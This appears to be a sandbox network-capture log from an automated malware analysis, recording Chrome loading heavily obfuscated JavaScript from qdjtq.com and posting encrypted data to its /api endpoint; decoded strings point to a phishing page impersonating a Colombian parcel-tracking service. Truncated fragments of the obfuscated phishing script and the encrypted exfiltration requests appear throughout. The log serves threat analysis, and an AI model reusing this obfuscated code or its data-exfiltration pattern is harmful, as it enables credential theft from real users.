            2024-09-27 00:29:38 UTC1917INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 36 38 62 36 62 2c 5f 30 78 33 62 33 34 62 34 29 7b 63 6f 6e 73 74 20 5f 30 78 33 65 61 66 38 35 3d 61 32 38 5f 30 78 33 31 37 34 2c 5f 30 78 33 36 32 37 64 31 3d 5f 30 78 36 38 62 36 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 62 32 61 35 38 37 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 64 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 37 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 35 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38 35 28 30 78 31 30 39 29 29 2f 30 78 34 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 65 61 66 38
            Data Ascii: (function(_0x68b6b,_0x3b34b4){const _0x3eaf85=a28_0x3174,_0x3627d1=_0x68b6b();while(!![]){try{const _0xb2a587=-parseInt(_0x3eaf85(0x10d))/0x1*(parseInt(_0x3eaf85(0x107))/0x2)+parseInt(_0x3eaf85(0x105))/0x3+-parseInt(_0x3eaf85(0x109))/0x4+parseInt(_0x3eaf8


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            22192.168.2.649741129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:38 UTC363OUTGET /modify/assets/09bf01f8ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:38 UTC360INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:38 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 2091
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"82b-19024951b30"
            2024-09-27 00:29:38 UTC2091INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 61 37 34 37 62 2c 5f 30 78 34 38 39 32 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 39 31 61 3d 61 32 5f 30 78 35 35 61 39 2c 5f 30 78 32 63 31 39 66 34 3d 5f 30 78 34 61 37 34 37 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 63 66 34 35 38 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 62 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 62 37 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 63 34 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 62 64 29 29 2f 30 78 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61
            Data Ascii: (function(_0x4a747b,_0x4892c3){const _0x4ad91a=a2_0x55a9,_0x2c19f4=_0x4a747b();while(!![]){try{const _0x4cf458=-parseInt(_0x4ad91a(0xbb))/0x1*(parseInt(_0x4ad91a(0xb7))/0x2)+parseInt(_0x4ad91a(0xc4))/0x3*(parseInt(_0x4ad91a(0xbd))/0x4)+-parseInt(_0x4ad91a


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            23192.168.2.649740129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:38 UTC363OUTGET /modify/assets/00b63b5cajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:38 UTC360INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:38 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 2600
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"a28-19024951b30"
            2024-09-27 00:29:38 UTC2600INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 38 37 65 63 62 33 2c 5f 30 78 32 39 35 62 32 31 29 7b 63 6f 6e 73 74 20 5f 30 78 35 34 30 32 65 62 3d 61 30 5f 30 78 31 66 36 37 2c 5f 30 78 63 65 66 35 33 61 3d 5f 30 78 38 37 65 63 62 33 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 30 35 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 38 61 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 39 36 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 38 66 29 29 2f 30 78 33 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 38 38 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30
            Data Ascii: (function(_0x87ecb3,_0x295b21){const _0x5402eb=a0_0x1f67,_0xcef53a=_0x87ecb3();while(!![]){try{const _0x4ad053=parseInt(_0x5402eb(0x18a))/0x1*(-parseInt(_0x5402eb(0x196))/0x2)+-parseInt(_0x5402eb(0x18f))/0x3+parseInt(_0x5402eb(0x188))/0x4+-parseInt(_0x540


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            24192.168.2.649742129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:38 UTC363OUTGET /modify/assets/afbbad07ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:39 UTC362INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:38 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 35011
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:32 GMT
            ETag: W/"88c3-19024952300"
            2024-09-27 00:29:39 UTC16022INData Raw: 76 61 72 20 61 32 35 5f 30 78 31 36 35 64 32 64 3d 61 32 35 5f 30 78 63 62 39 36 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 35 62 66 35 2c 5f 30 78 35 64 66 30 64 39 29 7b 76 61 72 20 5f 30 78 35 37 65 39 36 66 3d 61 32 35 5f 30 78 63 62 39 36 2c 5f 30 78 33 39 65 36 37 61 3d 5f 30 78 31 35 35 62 66 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 35 32 63 31 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 31 38 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 31 64 39 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 31 36 62 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 32
            Data Ascii: var a25_0x165d2d=a25_0xcb96;(function(_0x155bf5,_0x5df0d9){var _0x57e96f=a25_0xcb96,_0x39e67a=_0x155bf5();while(!![]){try{var _0x152c10=-parseInt(_0x57e96f(0x18b))/0x1+-parseInt(_0x57e96f(0x1d9))/0x2*(parseInt(_0x57e96f(0x16b))/0x3)+parseInt(_0x57e96f(0x2
            2024-09-27 00:29:39 UTC16384INData Raw: 78 32 31 26 26 21 70 28 5b 27 63 68 72 6f 6d 69 75 6d 27 5d 2c 5f 30 78 33 35 64 33 66 64 29 3b 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 5f 30 78 33 37 63 36 32 37 29 7b 76 61 72 20 5f 30 78 32 62 33 39 64 39 3d 61 32 35 5f 30 78 31 36 35 64 32 64 2c 5f 30 78 33 62 32 32 38 33 3d 5f 30 78 33 37 63 36 32 37 5b 5f 30 78 32 62 33 39 64 39 28 30 78 31 39 30 29 2b 27 6e 64 27 5d 3b 69 66 28 5f 30 78 33 62 32 32 38 33 5b 5f 30 78 32 62 33 39 64 39 28 30 78 31 62 34 29 5d 3d 3d 3d 2d 30 78 32 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 32 62 33 39 64 39 28 30 78 32 32 38 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 47 28 5f 30 78 32 34 34 61 36 61 29 7b 76 61 72 20 5f 30 78 33 33 30 64 34 32 3d 61 32 35 5f 30 78 31 36 35 64 32 64 2c 5f 30 78 31 65 36 39 39 32 3d 5f 30 78 32
            Data Ascii: x21&&!p(['chromium'],_0x35d3fd);}}function F(_0x37c627){var _0x2b39d9=a25_0x165d2d,_0x3b2283=_0x37c627[_0x2b39d9(0x190)+'nd'];if(_0x3b2283[_0x2b39d9(0x1b4)]===-0x2)return u[_0x2b39d9(0x228)];}function G(_0x244a6a){var _0x330d42=a25_0x165d2d,_0x1e6992=_0x2
            2024-09-27 00:29:39 UTC2605INData Raw: 5f 30 78 34 33 62 39 63 33 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 5f 30 78 35 64 38 38 30 34 5b 5f 30 78 33 37 61 63 33 64 5d 3d 7b 27 73 74 61 74 65 27 3a 5f 30 78 34 33 62 39 63 33 5b 5f 30 78 35 65 63 66 66 66 28 30 78 31 62 34 29 5d 2c 27 65 72 72 6f 72 27 3a 27 27 5b 5f 30 78 35 65 63 66 66 66 28 30 78 32 30 34 29 5d 28 5f 30 78 34 33 62 39 63 33 5b 27 6e 61 6d 65 27 5d 2c 27 3a 5c 78 32 30 27 29 5b 5f 30 78 35 65 63 66 66 66 28 30 78 32 30 34 29 5d 28 5f 30 78 34 33 62 39 63 33 5b 27 6d 65 73 73 61 67 65 27 5d 29 7d 3a 5f 30 78 35 64 38 38 30 34 5b 5f 30 78 33 37 61 63 33 64 5d 3d 7b 27 73 74 61 74 65 27 3a 2d 30 78 33 2c 27 65 72 72 6f 72 27 3a 5f 30 78 34 33 62 39 63 33 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 27 27 5b 27 63 6f 6e
            Data Ascii: _0x43b9c3 instanceof c?_0x5d8804[_0x37ac3d]={'state':_0x43b9c3[_0x5ecfff(0x1b4)],'error':''[_0x5ecfff(0x204)](_0x43b9c3['name'],':\x20')[_0x5ecfff(0x204)](_0x43b9c3['message'])}:_0x5d8804[_0x37ac3d]={'state':-0x3,'error':_0x43b9c3 instanceof Error?''['con


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            25192.168.2.649743129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:38 UTC611OUTPOST /api/MC42MTg2MTE1MDg1Nzk2NjAy HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 308
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-platform: "Windows"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Content-Type: text/encrypt
            Accept: */*
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:38 UTC308OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 2b 53 41 55 73 62 42 39 48 33 67 33 35 50 67 50 4c 55 4c 56 54 76 6f 4d 51 42 53 39 71 79 77 4e 4f 4b 54 36 2b 33 34 4b 32 31 43 4d 41 4d 63 6b 66 44 52 52 5a 4f 41 4c 62 52 49 48 46 47 4e 67 36 4a 73 49 59 32 33 2f 67 45 70 48 44 33 6e 58 46 46 57 4e 32 4d 6b 39 34 51 2b 52 36 42 45 68 49 4a 6b 45 2b 42 52 59 45 43 67 37 6f 4f 44 6b 71 6b 39 61 72 4e 67 2f 39 74 32 30 47 69 51 36 34 5a 47 6e 68 4b 64 78 76 76 6a 7a 69 6b 4f 79 55 41 74 63 71 43 2f 57 72 4a 41 68 41 53 48 4b 67 52 56 58 43 41 77 69 50 4b 51 4a 6b 4f 34 6b 53 46 64 34 30 66 37 76 6b 30 72 2b 30 34 44 76 51 68 6d 36 47 39 41 62 6f 64 48 73 39 4a 49 38 39 50 30 4b 30 4c 56 68 2b 36 4c 2f 49 79 5a 6c 2f 34 52 35 6e 49 77 4e 76 66 74 37 53 2f 2b 52 73 61 66 4c 45
            Data Ascii: U2FsdGVkX1+SAUsbB9H3g35PgPLULVTvoMQBS9qywNOKT6+34K21CMAMckfDRRZOALbRIHFGNg6JsIY23/gEpHD3nXFFWN2Mk94Q+R6BEhIJkE+BRYECg7oODkqk9arNg/9t20GiQ64ZGnhKdxvvjzikOyUAtcqC/WrJAhASHKgRVXCAwiPKQJkO4kSFd40f7vk0r+04DvQhm6G9AbodHs9JI89P0K0LVh+6L/IyZl/4R5nIwNvft7S/+RsafLE
            2024-09-27 00:29:39 UTC240INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:38 GMT
            Content-Type: application/json; charset=utf-8
            Content-Length: 988
            Connection: close
            Access-Control-Allow-Origin: *
            ETag: W/"3dc-G8epmBW2q6/SJZbYUPbAZlnGFjI"
            2024-09-27 00:29:39 UTC988INData Raw: 55 32 46 73 64 47 56 6b 58 31 2b 77 71 48 69 51 57 2f 50 34 6f 4c 78 6b 2b 6f 6f 53 44 6c 79 4f 4b 4d 53 35 2b 6b 56 34 63 75 4d 79 42 38 69 74 35 70 62 4a 6d 65 70 30 51 4c 30 57 64 62 54 53 5a 2f 31 58 74 32 48 51 69 4d 58 2b 56 75 6e 30 37 49 43 48 69 72 36 53 76 79 6b 68 32 4a 62 5a 4d 48 54 59 49 67 32 62 31 2b 71 70 2f 75 33 62 37 5a 67 52 5a 35 38 4d 34 6a 2f 47 33 59 77 44 42 62 34 78 33 4e 76 2b 30 36 2f 59 37 6f 42 67 78 4d 6e 79 4f 4c 37 67 75 70 6e 45 39 6f 69 43 56 77 65 4f 6a 6f 33 30 53 58 45 43 5a 68 35 33 79 70 69 38 58 32 62 45 48 77 49 51 38 58 64 2f 48 66 79 4d 45 30 30 6c 38 74 6b 46 70 77 45 46 61 33 66 4c 4b 4c 6f 5a 32 6e 4f 4a 78 51 43 70 6c 43 73 76 65 64 30 61 61 79 66 51 4a 45 6a 2b 53 4b 62 75 6c 33 41 63 6a 6e 46 54 57 73 7a
            Data Ascii: U2FsdGVkX1+wqHiQW/P4oLxk+ooSDlyOKMS5+kV4cuMyB8it5pbJmep0QL0WdbTSZ/1Xt2HQiMX+Vun07ICHir6Svykh2JbZMHTYIg2b1+qp/u3b7ZgRZ58M4j/G3YwDBb4x3Nv+06/Y7oBgxMnyOL7gupnE9oiCVweOjo30SXECZh53ypi8X2bEHwIQ8Xd/HfyME00l8tkFpwEFa3fLKLoZ2nOJxQCplCsved0aayfQJEj+SKbul3AcjnFTWsz


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            26192.168.2.649744129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:38 UTC363OUTGET /modify/assets/522b5b49ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:39 UTC363INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:39 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 87444
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"15594-19024951b30"
            2024-09-27 00:29:39 UTC16021INData Raw: 63 6f 6e 73 74 20 61 31 34 5f 30 78 33 62 65 62 34 32 3d 61 31 34 5f 30 78 31 39 34 30 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 35 62 34 65 38 2c 5f 30 78 62 65 34 65 61 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 38 32 31 64 33 3d 61 31 34 5f 30 78 31 39 34 30 2c 5f 30 78 66 37 62 35 31 65 3d 5f 30 78 33 35 62 34 65 38 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 62 35 36 31 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38 32 31 64 33 28 30 78 31 39 36 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38 32 31 64 33 28 30 78 32 37 64 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38 32 31 64 33 28 30 78 32 66 30 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38
            Data Ascii: const a14_0x3beb42=a14_0x1940;(function(_0x35b4e8,_0xbe4ea8){const _0x3821d3=a14_0x1940,_0xf7b51e=_0x35b4e8();while(!![]){try{const _0x5b5613=-parseInt(_0x3821d3(0x196))/0x1*(-parseInt(_0x3821d3(0x27d))/0x2)+-parseInt(_0x3821d3(0x2f0))/0x3+-parseInt(_0x38
            2024-09-27 00:29:39 UTC16384INData Raw: 72 63 27 3a 5f 2c 27 77 69 64 74 68 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 33 39 29 2c 27 68 65 69 67 68 74 27 3a 27 32 37 27 2c 27 61 6c 74 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 32 63 29 2b 27 67 61 27 7d 29 5d 2c 2d 30 78 31 29 2c 5a 3d 61 31 34 5f 30 78 34 39 35 64 64 66 28 27 75 6c 27 2c 7b 27 63 6c 61 73 73 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 36 36 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 64 64 29 2b 27 5c 78 32 30 66 6c 65 78 2d 73 6d 2d 63 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 61 32 29 2b 27 2d 6d 64 2d 72 6f 77 5c 78 32 30 66 6c 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 66 37 29 7d 2c 5b 61 31 34 5f 30 78 34 39 35 64 64 66 28 27 6c 69 27 2c 6e 75 6c 6c 2c 5b
            Data Ascii: rc':_,'width':a14_0x3beb42(0x439),'height':'27','alt':a14_0x3beb42(0x22c)+'ga'})],-0x1),Z=a14_0x495ddf('ul',{'class':a14_0x3beb42(0x366)+a14_0x3beb42(0x3dd)+'\x20flex-sm-c'+a14_0x3beb42(0x4a2)+'-md-row\x20fl'+a14_0x3beb42(0x4f7)},[a14_0x495ddf('li',null,[
            2024-09-27 00:29:39 UTC16384INData Raw: 28 27 61 27 2c 7b 27 68 72 65 66 27 3a 27 68 74 74 70 3a 2f 2f 77 77 77 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 35 66 29 2b 27 65 67 61 2e 63 6f 6d 2f 77 70 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 64 35 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 33 66 29 2b 27 64 69 67 69 74 61 6c 65 73 2f 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 30 32 29 2c 27 63 6c 61 73 73 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 33 32 29 7d 2c 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 61 66 29 29 5d 29 5d 29 5d 29 5d 29 2c 61 31 34 5f 30 78 34 39 35 64 64 66 28 27 64 69 76 27 2c 7b 27 63 6c 61 73 73 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 35 30 30 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 63
            Data Ascii: ('a',{'href':'http://www'+a14_0x3beb42(0x25f)+'ega.com/wp'+a14_0x3beb42(0x2d5)+a14_0x3beb42(0x33f)+'digitales/'+a14_0x3beb42(0x402),'class':a14_0x3beb42(0x232)},a14_0x3beb42(0x3af))])])])]),a14_0x495ddf('div',{'class':a14_0x3beb42(0x500)+a14_0x3beb42(0x2c
            2024-09-27 00:29:39 UTC16384INData Raw: 30 78 34 30 30 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 33 65 29 2b 27 2d 30 2e 30 37 35 30 30 30 33 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 34 32 29 2b 27 30 30 31 5c 78 32 30 39 2e 33 4c 30 2e 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 39 33 29 2b 27 5a 27 2c 27 69 64 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 61 30 29 2c 27 66 69 6c 6c 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 64 65 29 2c 27 66 69 6c 6c 2d 72 75 6c 65 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 31 61 36 29 2c 27 73 74 72 6f 6b 65 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 31 30 29 7d 29 5d 29 5d 29 2c 61 31 34 5f 30 78 34 39 35 64 64 66 28 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 38 35 29 2c 7b 27 63
            Data Ascii: 0x400)+a14_0x3beb42(0x23e)+'-0.0750003'+a14_0x3beb42(0x442)+'001\x209.3L0.'+a14_0x3beb42(0x293)+'Z','id':a14_0x3beb42(0x4a0),'fill':a14_0x3beb42(0x2de),'fill-rule':a14_0x3beb42(0x1a6),'stroke':a14_0x3beb42(0x410)})])]),a14_0x495ddf(a14_0x3beb42(0x385),{'c
            2024-09-27 00:29:39 UTC16384INData Raw: 28 30 78 34 33 64 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 35 36 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 61 65 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 34 39 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 66 38 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 35 37 30 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 31 64 66 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 31 61 39 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 35 35 38 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 37 64 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 39 65 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 35 37 29 2b 27 77 77 2e 73 65 72 76 69 65 6e 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30
            Data Ascii: (0x43d)+a14_0x3beb42(0x256)+a14_0x3beb42(0x3ae)+a14_0x3beb42(0x449)+a14_0x3beb42(0x2f8)+a14_0x3beb42(0x570)+a14_0x3beb42(0x1df)+a14_0x3beb42(0x1a9)+a14_0x3beb42(0x558)+a14_0x3beb42(0x47d)+a14_0x3beb42(0x49e)+a14_0x3beb42(0x357)+'ww.servien'+a14_0x3beb42(0
            2024-09-27 00:29:39 UTC5887INData Raw: 2d 74 6f 62 2d 62 61 72 5c 78 32 32 27 2c 27 4b 44 48 41 41 52 77 50 39 4b 27 2c 27 5c 78 32 30 74 69 74 6c 65 2d 74 6f 62 27 2c 27 61 6c 2f 72 61 73 74 72 65 6f 27 2c 27 2e 67 6f 76 2e 63 6f 2f 5c 78 32 32 5c 78 32 30 27 2c 27 31 38 32 36 39 34 30 38 32 5c 78 32 32 27 2c 27 65 2d 6f 70 65 6e 65 72 27 2c 27 62 2d 6d 65 6e 75 5c 78 32 32 3e 3c 6c 27 2c 27 5c 78 32 30 74 6f 62 2d 62 61 72 2d 73 27 2c 27 64 2d 66 6c 65 78 5c 78 32 30 74 65 78 27 2c 27 73 74 72 65 6f 2d 65 6e 76 69 27 2c 27 69 73 74 2d 75 6e 73 74 79 6c 27 2c 27 3e 3c 2f 64 69 76 3e 3c 64 69 27 2c 27 61 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 68 74 27 2c 27 61 76 2d 6c 69 6e 6b 5c 78 32 32 3e 4f 27 2c 27 78 2d 73 6d 2d 63 6f 6c 75 6d 27 2c 27 52 61 73 74 72 65 61 72 5c 78 32 30 70 27 2c 27 41
            Data Ascii: -tob-bar\x22','KDHAARwP9K','\x20title-tob','al/rastreo','.gov.co/\x22\x20','182694082\x22','e-opener','b-menu\x22><l','\x20tob-bar-s','d-flex\x20tex','streo-envi','ist-unstyl','></div><di','a\x20href=\x22ht','av-link\x22>O','x-sm-colum','Rastrear\x20p','A


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            27192.168.2.649745129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:39 UTC363OUTGET /modify/assets/230e1227ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:40 UTC361INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:39 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 6439
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"1927-19024951b30"
